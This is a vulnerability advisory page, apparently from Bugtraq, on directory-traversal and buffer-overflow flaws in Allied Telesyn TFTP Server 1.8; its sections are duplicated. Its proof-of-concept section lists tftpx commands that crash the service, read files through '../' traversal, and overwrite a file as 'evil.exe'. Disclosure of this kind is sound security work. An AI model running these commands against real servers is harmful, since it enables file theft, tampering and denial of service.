Allied Telesyn TFTP Daemon Multiple Remote Vulnerabilities
BID:11584
Info
Allied Telesyn TFTP Daemon Multiple Remote Vulnerabilities
| Bugtraq ID: | 11584 |
| Class: | Unknown |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 02 2004 12:00AM |
| Updated: | Nov 17 2010 05:06PM |
| Credit: | Discovery of these vulnerabilities is credited to Luigi Auriemma. |
| Vulnerable: |
Allied Telesyn TFTP Daemon 1.8 Allied Telesis AT-TFTP Server 1.8 |
| Not Vulnerable: | |
Discussion
Allied Telesyn TFTP Daemon Multiple Remote Vulnerabilities
The Allied Telesyn TFTP service is reported to be prone to multiple vulnerabilities. The following specific issues are reported:
1. Allied Telesyn TFTP Server is reported susceptible to a directory-traversal vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input data.
This vulnerability allows remote attackers to retrieve or overwrite the contents of arbitrary potentially sensitive files located on the serving appliance with the privileges of the TFTP server process.
2. Allied Telesyn TFTP Server is reported prone to a remote buffer-overflow vulnerability.
This vulnerability may be exploited by a remote attacker to crash the affected service.
NOTE (November 17, 2010): This vendor may now be known as Allied Telesis.
The Allied Telesyn TFTP service is reported to be prone to multiple vulnerabilities. The following specific issues are reported:
1. Allied Telesyn TFTP Server is reported susceptible to a directory-traversal vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input data.
This vulnerability allows remote attackers to retrieve or overwrite the contents of arbitrary potentially sensitive files located on the serving appliance with the privileges of the TFTP server process.
2. Allied Telesyn TFTP Server is reported prone to a remote buffer-overflow vulnerability.
This vulnerability may be exploited by a remote attacker to crash the affected service.
NOTE (November 17, 2010): This vendor may now be known as Allied Telesis.
Exploit / POC
Allied Telesyn TFTP Daemon Multiple Remote Vulnerabilities
The following proof of concept exploits are available:
A] tftpx -f example.com 229 none
B] tftpx example.com ../secret.txt secret.txt
tftpx -u example.com ../../windows/calc.exe evil.exe
The following proof of concept exploits are available:
A] tftpx -f example.com 229 none
B] tftpx example.com ../secret.txt secret.txt
tftpx -u example.com ../../windows/calc.exe evil.exe
Solution / Fix
Allied Telesyn TFTP Daemon Multiple Remote Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Allied Telesyn TFTP Daemon Multiple Remote Vulnerabilities
References:
References:
- Allied Telesyn Homepage (Allied Telesyn)
- Allied Telesyn TFTP Daemon Multiple Vulnerabilities (Luigi Auriemma)